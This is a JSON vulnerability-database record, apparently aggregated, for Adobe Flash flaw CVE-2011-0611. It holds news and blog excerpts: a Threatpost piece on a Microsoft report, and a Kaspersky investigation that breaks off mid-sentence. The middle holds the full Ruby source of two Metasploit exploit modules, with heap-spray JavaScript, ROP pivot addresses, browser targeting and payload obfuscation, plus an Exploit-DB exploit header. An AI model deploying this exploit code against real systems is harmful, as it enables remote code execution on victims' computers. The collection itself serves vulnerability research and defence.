The two vulnerabilities that accounted for most of that 0.12 percent, [CVE-2011-0611](<https://threatpost.com/adobe-flash-bug-being-used-attacks-word-documents-041211/>) and CVE-2011-2110, affected Adobe\u2019s Flash Player.\n\nThe remaining infections were propagated through social engineering, AutoRun exploitation, file infection and password attacks, according to the report.\n\nMalware that relied on user interaction comprised 45 percent of the attacks measured while malware that exploited the system\u2019s AutoRun feature comprised 43 percent, or more than a third of all detections. 26 percent of the attacks came from USB threats and 17 percent from the network, respectively.\n\nSpanning well over 100 pages and drawing upon intelligence from 100+ countries, this year\u2019s Security Intelligence Report evaluated vulnerability disclosures for the first half of 2011, January 1 through June 30.\n\nWhen it comes to older vulnerabilities, the report suggests patch management is key going forward. Ninety percent of the recorded attacks are listed as Update Long Available, according to Vinny Gullotto, the general manager of Microsoft\u2019s Malware Protection Center (MMPC). This means that there had been a security update available for each of the vulnerabilities for at least a year before the recorded infection. 
While it\u2019s been made clear before that [cybercriminals are consistently targeting old vulnerabilities](<https://threatpost.com/forget-apt-mass-malware-still-big-threat-062011/>), new numbers show its imperative is to keep old products patched.\n", "modified": "2013-04-17T16:33:37", "published": "2011-10-11T17:41:11", "id": "THREATPOST:66AAE48AA5E53AA0EB4A9179456F65FC", "href": "https://threatpost.com/zero-day-flaws-overvalued-says-new-microsoft-report-101111/75737/", "type": "threatpost", "title": "Zero Day Flaws Overvalued Says New Microsoft Report", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Reader X 10.0.0 10.0.1 - Atom Type Confusion", "edition": 1, "published": "2011-07-03T00:00:00", "title": "Adobe Reader X 10.0.0 10.0.1 - Atom Type Confusion", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-07-03T00:00:00", "id": "EXPLOITPACK:1A046239C4FEFA2569E258EE0A65227F", "href": "", "sourceData": "# Exploit Title: Adobe Reader X Atom Type Confusion Vulnerability Exploit\n# Date: 7/3/2011\n# Author: Snake ( Shahriyar.j < at > gmail )\n# Version: Adobe Reader X < 10.1\n# Tested on: 10.0.0 - 10.0.1 - Windows 7 - IE/FF/Opera\n# CVE : CVE-2011-0611\n#\n#This is the exploit I wrote for Abysssec \"The Arashi\" article.\n#It gracefully bypass DEP/ASLR ( not the sandbox ) in Adobe Reader X,\n#and we named this method \"Tatsumaki DEP/ASRL Bypass\" : >\n#It work reliably on IE9/FF4 and other browsers.\n#\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\n http://www.exploit-db.com/docs/17469.pdf\n# me : twitter.com/ponez\n# also check here for The Persian docs of this methods and more :\nhttp://www.0days.ir/article/\n\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17473.pdf (cve-2011-0611_exploit.pdf)", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-07-11T20:28:24", "description": "This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution. Please note for IE 8 targets, Java Runtime Environment must be available on the victim machine in order to work properly.\n", "published": "2011-04-16T02:09:33", "type": "metasploit", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_FLASH10O", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability in Adobe Flash Player that was discovered,\n and has been exploited actively in the wild. 
By embedding a specially crafted .swf\n file, Adobe Flash crashes due to an invalid use of an object type, which allows\n attackers to overwrite a pointer in memory, and results arbitrary code execution.\n Please note for IE 8 targets, Java Runtime Environment must be available on the\n victim machine in order to work properly.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'sinn3r',\n ],\n 'References' =>\n [\n [ 'CVE', '2011-0611' ],\n [ 'OSVDB', '71686' ],\n [ 'BID', '47314' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],\n [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],\n [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],\n [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],\n [ 'URL', 'http://secunia.com/blog/210' ],\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"process\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [\n 'IE 6 on Windows XP SP3',\n {\n 'Rop' => false,\n 'Pivot' => nil, #No ROP no pivot\n 'Offset1' => '0x01', #For aligning the payload\n 'Offset2' => '0x02', #For aligning the CALL\n 'Max1' => '0x150', #First spray\n 'Max2' => '0x200' #Second spray\n }\n ],\n [\n 'IE 7 on Windows XP SP3',\n {\n 'Rop' => false,\n 'Pivot' => nil, #No ROP no pivot\n 'Offset1' => '0x01', #For aligning the payload\n 'Offset2' => '0x02', #For aligning the CALL\n 'Max1' => '0x150', #First spray\n 'Max2' => '0x200' #Second spray\n }\n ],\n [\n 'IE 8 on Windows XP SP3',\n {\n 'Rop' => true,\n 'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)\n 'Offset1' => '0x5E2', #Offset for rop+payload\n 'Offset2' => '0x02', #Offset to 0x11111110\n 'Max1' => '0x250', #First spray\n 'Max2' => 
'0x200' #Second spray\n }\n ],\n [\n 'IE 7 on Windows Vista',\n {\n 'Rop' => false,\n 'Pivot' => nil, #No ROP no pivot\n 'Offset1' => '0x01', #For aligning the payload\n 'Offset2' => '0x02', #For aligning the CALL\n 'Max1' => '0x150', #First spray\n 'Max2' => '0x200' #Second spray\n }\n ],\n [\n 'IE 8 on Windows 7',\n {\n 'Rop' => true,\n 'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)\n 'Offset1' => '0x5F4', #Offset for rop+payload\n 'Offset2' => '0x02', #Offset to 0x11111110\n 'Max1' => '0x101', #First spray\n 'Max2' => '0x300' #Second spray\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Apr 11 2011\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])\n ], self.class\n )\n\n end\n\n def exploit\n path = File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2011-0611.swf\")\n f = File.open(path, \"rb\")\n @trigger = f.read(f.stat.size)\n f.close\n super\n end\n\n def get_target(request)\n agent = request.headers['User-Agent']\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\n #Windows XP SP3 + IE 6.0\n return targets[1]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\n #Windows XP SP3 + IE 7.0\n return targets[2]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\n #Windows XP SP3 + IE 8.0 + JRE6\n return targets[3]\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\n #Windows Vista + IE 7\n return targets[4]\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\n #Windows 7 + IE 8 + JRE6\n return targets[5]\n else\n return nil\n end\n end\n\n def on_request_uri(cli, request)\n #Set default target\n my_target = target\n\n #If user chooses automatic target, we choose one based on user agent\n if my_target.name =~ /Automatic/\n my_target = get_target(request)\n if my_target.nil?\n print_error(\"Sending 404 for unknown user-agent\")\n send_not_found(cli)\n return\n end\n vprint_status(\"Target selected: #{my_target.name}\")\n end\n\n 
vprint_status(\"URL: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n #Browser requests our trigger file, why not\n print_status(\"Sending trigger SWF...\")\n send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )\n return\n end\n\n #Targets that don't need ROP\n pivot = \"\\xb8\\x0c\\x0c\\x0c\\x0c\" #MOV EAX,0x0c0c0c0c\n pivot << \"\\xff\\xe0\" #JMP EAX\n pivot << \"\\x41\" #Pad\n\n #Targets that need ROP\n if my_target['Rop']\n #Target Addr=0x11111110\n pivot =\n [\n 0x0c0c0c0c, # Padding. Value for ESP after the XCHG pivot\n my_target['Pivot'], # ROP Pivot\n 0x7c346b52, # EAX (POP ESP; RETN)\n ].pack('V*')\n\n #Target Addr=0x0c0c0c0c\n p = generate_rop_payload('java', payload.encoded)\n else\n p = payload.encoded\n end\n\n arch = Rex::Arch.endian(my_target.arch)\n\n shellcode = Rex::Text.to_unescape(p, arch)\n pivot = Rex::Text.to_unescape(pivot, arch)\n\n #Extract string based on target\n if my_target.name == 'IE 8 on Windows 7'\n js_extract_str = \"var block = shellcode.substring(0, (0x7ff00-6)/2);\"\n elsif my_target.name == 'IE 8 on Windows XP SP3'\n js_extract_str = \"var block = shellcode.substring(2, (0x40000-0x21)/2);\"\n else\n js_extract_str = \"var block = shellcode.substring(0, (0x80000-6)/2);\"\n end\n\n randnop = rand_text_alpha(rand(100) + 1)\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4)\n\n js = <<-JS\n function heap_spray(heaplib, nops, code, offset, max) {\n while (nops.length < 0x2000) nops += nops;\n var offset = nops.substring(0, offset);\n var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);\n while (shellcode.length < 0x40000) shellcode += shellcode;\n #{js_extract_str}\n heaplib.gc();\n for (var i=1; i<max; i++) {\n heaplib.alloc(block);\n }\n }\n\n var heap_obj = new heapLib.ie(0x20000);\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n var code = unescape(\"#{shellcode}\");\n heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, 
#{my_target['Max1']});\n var fake_pointers = unescape(\"#{pivot}\");\n heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});\n JS\n\n js = heaplib(js, {:noobfu => true} )\n\n #Javascript obfuscation is optional\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n trigger_file_name = \"#{get_resource}/#{rand_text_alpha(rand(3))}.swf\"\n\n html = <<-EOS\n <html>\n <head>\n <script>\n #{js}\n </script>\n </head>\n <body>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"0\" height=\"0\"\n codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\n <param name=\"movie\" value=\"#{trigger_file_name}\" />\n <embed src=\"#{trigger_file_name}\" quality=\"high\" type=\"application/x-shockwave-flash\"\n pluginspage=\"http://www.macromedia.com/go/getflashplayer\">\n </embed>\n </body>\n </html>\n EOS\n\n html = html.gsub(/^ {4}/, \"\")\n\n print_status(\"Sending HTML to...\")\n send_response(cli, html, {'Content-Type' => \"text/html\"} )\n end\nend\n\n\n=begin\n0:000> r\neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0\neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\nFlash10o+0xd01f6:\n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????\n0:000> dd ecx\n01d650b0 11111110 00000000 00000000 00000000\n01d650c0 00000000 00000000 00000000 00000000\n01d650d0 00000000 00000000 00000000 00000000\n01d650e0 00000000 00000000 00000000 00000000\n01d650f0 00000000 00000000 00000000 00000000\n01d65100 00000000 00000000 00000000 00000000\n01d65110 00000000 00000000 00000000 00000000\n01d65120 00000000 00000000 00000000 00000000\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:21", "description": "", "published": "2011-04-17T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-17T00:00:00", "id": "PACKETSTORM:100507", "href": "https://packetstormsecurity.com/files/100507/Adobe-Flash-Player-10.2.153.1-SWF-Memory-Corruption-Vulnerability.html", "sourceData": "`## \n# $Id: adobe_flashplayer_flash10o.rb 12330 2011-04-16 02:09:33Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability in Adobe Flash Player that was discovered, and \nhas been exploited actively in the wild. By embedding a specially crafted .swf file, \nAdobe Flash crashes due to an invalid use of an object type, which allows attackers to \noverwrite a pointer in memory, and results arbitrary code execution. 
\n}, \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 12330 $\", \n'Author' => \n[ \n'sinn3r', \n], \n'References' => \n[ \n[ 'CVE', '2011-0611' ], \n[ 'OSVDB', '71686' ], \n[ 'BID', '47314' ], \n[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ], \n[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ], \n[ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ], \n[ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ], \n[ 'URL', 'http://secunia.com/blog/210' ], \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"process\", \n'InitialAutoRunScript' => 'migrate -f', \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Apr 11 2011\", \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(cli, request) \n \nagent = request.headers['User-Agent'] \nif agent !~ /MSIE \\d\\.\\d/ and agent !~ /NT \\d\\.\\d/ \nsend_not_found(cli) \nreturn \nend \n \nif request.uri =~ /\\.swf/ \nprint_status(\"Sending trigger SWF...\") \nsend_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} ) \nreturn \nend \n \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \nnopsled = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch)) \n \nswf_name = rand_text_alpha(rand(3)) \njs_func_name = rand_text_alpha(rand(6) +3) \njs_var_blocks_name = rand_text_alpha(rand(6) + 3) \njs_var_shell_name = rand_text_alpha(rand(6) + 3) \njs_var_nopsled_name = rand_text_alpha(rand(6) + 3) \njs_var_index_name = rand_text_alpha(rand(6) + 3) \njs_var_padding_offset = rand_text_alpha(rand(6) + 3) \ntrigger_file_name = \"#{get_resource}/#{swf_name}.swf\" \n \nhtml = <<-EOS \n<html> 
\n<head> \n<script> \nfunction #{js_func_name}() { \nvar #{js_var_blocks_name} = new Array(); \nvar #{js_var_shell_name} = unescape(\"#{shellcode}\"); \nvar #{js_var_nopsled_name} = unescape(\"#{nopsled}\"); \nvar #{js_var_padding_offset} = #{js_var_shell_name}.length; \nwhile (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape(\"#{nopsled}\") }; \n#{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length); \n#{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name}; \nfor (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) { \n#{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length); \n} \n} \n#{js_func_name}(); \n</script> \n</head> \n<body> \n<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"0\" height=\"0\" \ncodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\"> \n<param name=\"movie\" value=\"#{trigger_file_name}\" /> \n<embed src=\"#{trigger_file_name}\" quality=\"high\" type=\"application/x-shockwave-flash\" \npluginspage=\"http://www.macromedia.com/go/getflashplayer\"> \n</embed> \n</body> \n</html> \nEOS \n \nhtml = html.gsub(/^\\t\\t/, \"\") \n \nprint_status(\"Sending malicious HTML to #{cli.peerhost}:#{cli.peerport}\") \nsend_response(cli, html, {'Content-Type' => \"text/html\"} ) \nend \n \ndef exploit \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2011-0611.swf\") \nf = File.open(path, \"rb\") \n@trigger = f.read(f.stat.size) \nf.close \n \nsuper \nend \nend \n \n \n=begin \n0:000> r \neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0 \neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202 \nFlash10o+0xd01f6: \n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=???????? 
\n0:000> dd ecx \n01d650b0 11111110 00000000 00000000 00000000 \n01d650c0 00000000 00000000 00000000 00000000 \n01d650d0 00000000 00000000 00000000 00000000 \n01d650e0 00000000 00000000 00000000 00000000 \n01d650f0 00000000 00000000 00000000 00000000 \n01d65100 00000000 00000000 00000000 00000000 \n01d65110 00000000 00000000 00000000 00000000 \n01d65120 00000000 00000000 00000000 00000000 \n=end`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/100507/adobe_flashplayer_flash10o.rb.txt"}], "securelist": [{"lastseen": "2017-11-27T08:03:02", "bulletinFamily": "blog", "cvelist": ["CVE-2009-3869", "CVE-2010-0094", "CVE-2010-0188", "CVE-2010-0480", "CVE-2010-0840", "CVE-2010-0842", "CVE-2010-1297", "CVE-2010-3563", "CVE-2010-3653", "CVE-2010-3654", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-3400", "CVE-2011-3544", "CVE-2012-0507", "CVE-2012-0754", "CVE-2012-1723", "CVE-2012-4681", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-2171", "CVE-2013-2423"], "description": "\n\n## Background\n\nIn early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee's home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:\n\n 1. Was our software used outside of its intended functionality to pull classified information from a person's computer?\n 2. When did this incident occur?\n 3. Who was this person?\n 4. 
Was there actually classified information found on the system inadvertently?\n 5. If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n 6. Why was the data pulled back in the first place? Is there evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n 7. What types of files were gathered from the supposed system?\n 8. Do we have any indication the user was subsequently \"hacked\" by Russian hackers and data exfiltrated?\n 9. Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n 10. Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?\n\nAnswering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as food for thought to everyone else. To further support the objectivity of the internal investigation we ran our investigation using multiple analysts of non-Russian origin and working outside of Russia to avoid even potential accusations of influence.\n\n## The Wall Street Journal Article\n\nThe article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:\n\n * The information \"stolen\" provides details on how the U.S. 
penetrates foreign computer networks and defends against cyberattacks.\n * A National Security Agency contractor removed the highly classified material and put it on his home computer.\n * The data ended up in the hands of so called \"Russian hackers\" after the files were detected using Kaspersky Lab software.\n * The incident occurred in 2015 but wasn't discovered until spring of last year [2016].\n * The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.\n * \"Hackers\" homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.\n\n## Beginning of Search\n\nHaving all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.\n\nThe first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including \"Equestre\", \"Equation\", \"Grayfish\", \"Fanny\", \"DoubleFantasy\" given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as \"HEUR:Trojan.Win32.Equestre.*\". Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. 
This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don't have all the details.\n\nBelow is a list of all hits in September for an \"Equestre\" signature, sorted by least amount to most. You can quickly identify the problem signature(s) mentioned above.\n\nDetection name (silent) | Count \n---|--- \nHEUR:Trojan.Win32.Equestre.u | 1 \nHEUR:Trojan.Win32.Equestre.gen.422674 | 3 \nHEUR:Trojan.Win32.Equestre.gen.422683 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427692 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427696 | 4 \nHEUR:Trojan.Win32.Equestre.gen.446160 | 6 \nHEUR:Trojan.Win32.Equestre.gen.446979 | 7 \nHEUR:Trojan.Win32.Equestre.g | 8 \nHEUR:Trojan.Win32.Equestre.ab | 9 \nHEUR:Trojan.Win32.Equestre.y | 9 \nHEUR:Trojan.Win32.Equestre.l | 9 \nHEUR:Trojan.Win32.Equestre.ad | 9 \nHEUR:Trojan.Win32.Equestre.t | 9 \nHEUR:Trojan.Win32.Equestre.e | 10 \nHEUR:Trojan.Win32.Equestre.v | 14 \nHEUR:Trojan.Win32.Equestre.gen.427697 | 18 \nHEUR:Trojan.Win32.Equestre.gen.424814 | 18 \nHEUR:Trojan.Win32.Equestre.s | 19 \nHEUR:Trojan.Win32.Equestre.x | 20 \nHEUR:Trojan.Win32.Equestre.i | 24 \nHEUR:Trojan.Win32.Equestre.p | 24 \nHEUR:Trojan.Win32.Equestre.q | 24 \nHEUR:Trojan.Win32.Equestre.gen.446142 | 34 \nHEUR:Trojan.Win32.Equestre.d | 39 \nHEUR:Trojan.Win32.Equestre.j | 40 \nHEUR:Trojan.Win32.Equestre.gen.427734 | 53 \nHEUR:Trojan.Win32.Equestre.gen.446149 | 66 \nHEUR:Trojan.Win32.Equestre.ag | 142 \nHEUR:Trojan.Win32.Equestre.b | 145 \nHEUR:Trojan.Win32.Equestre.h | 310 \nHEUR:Trojan.Win32.Equestre.gen.422682 | 737 \nHEUR:Trojan.Win32.Equestre.z | 1389 \nHEUR:Trojan.Win32.Equestre.af | 2733 
\nHEUR:Trojan.Win32.Equestre.c | 3792 \nHEUR:Trojan.Win32.Equestre.m | 4061 \nHEUR:Trojan.Win32.Equestre.k | 6720 \nHEUR:Trojan.Win32.Equestre.exvf.1 | 6726 \nHEUR:Trojan.Win32.Equestre.w | 6742 \nHEUR:Trojan.Win32.Equestre.f | 9494 \nHEUR:Trojan.Win32.Equestre.gen.446131 | 26329 \nHEUR:Trojan.Win32.Equestre.aa | 87527 \nHEUR:Trojan.Win32.Equestre.gen.447002 | 547349 \nHEUR:Trojan.Win32.Equestre.gen.447013 | 1472919 \n \nTaking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature \"HEUR:Trojan.Win32.Equestre.m\" and a 7zip archive (referred below as \"[undisclosed].7z\"). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. 
Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:\n\nHEUR:Trojan.Win32.Equestre.e \nHEUR:Trojan.Win32.Equestre.exvf.1 \nHEUR:Trojan.Win32.Equestre.g \nHEUR:Trojan.Win32.Equestre.gen.424814 \nHEUR:Trojan.Win32.Equestre.gen.427693 \nHEUR:Trojan.Win32.Equestre.gen.427696 \nHEUR:Trojan.Win32.Equestre.gen.427697 \nHEUR:Trojan.Win32.Equestre.gen.427734 \nHEUR:Trojan.Win32.Equestre.gen.446142 \nHEUR:Trojan.Win32.Equestre.gen.446993 \nHEUR:Trojan.Win32.Equestre.gen.465795 \nHEUR:Trojan.Win32.Equestre.i \nHEUR:Trojan.Win32.Equestre.j \nHEUR:Trojan.Win32.Equestre.m \nHEUR:Trojan.Win32.Equestre.p \nHEUR:Trojan.Win32.Equestre.q \nHEUR:Trojan.Win32.Equestre.x \nHEUR:Trojan.Win32.GrayFish.e \nHEUR:Trojan.Win32.GrayFish.f\n\nIn total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users' privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company's reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.\n\nThe file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. 
At this point in time, we felt confident we had found the source of the story fed to Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.\n\nOur next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.\n\nUpon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named \"[undisclosed].7z\" was removed from storage. Based on description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold: first, we don't need anything other than malware binaries to improve protection of our customers; and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not be consumed even to produce detection signatures based on descriptions.\n\nThis concern was later translated into a policy for all malware analysts, who are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. 
Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively \"detected on\" during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).\n\n## An Interesting Twist\n\nDuring the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the \"setup.exe\" file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 - for [detection coverage, see this VirusTotal link](<https://www.virustotal.com/#/file/6bcd591540dce8e0cef7b2dc6a378a10d79f94c3217bca5f05db3c24c2036340/detection>)) .\n\nLooking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of 